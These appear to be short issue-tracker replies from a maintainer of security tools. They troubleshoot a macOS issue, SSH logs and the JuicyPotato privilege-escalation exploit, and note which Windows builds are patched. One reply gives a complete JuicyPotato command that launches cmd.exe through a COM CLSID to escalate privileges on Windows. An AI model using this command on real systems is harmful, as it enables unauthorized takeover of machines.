I can't replicate this issue, but I have Mojave 10.14.3. Try to upgrade the system .. maybe it has been fixed automagically by Apple.
I don't know how ArubaOS-Switch works, but maybe the `env` would help a bit?
Check the ssh error logs (maybe here /var/log/auth.log) and then execute shellez command. You should see some errors.
I just tested in Windows 10 Enterprise `v10.0.16299.125` and it works. Try to change port, this should work: `JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}`
Ah right, build 1809 and Windows 2019 are patched. Check @decoder-it blog, he explained the story: https://decoder.cloud/2018/10/29/no-more-rotten-juicy-potato/
`-p` is a mandatory argument, maybe it's that the problem.
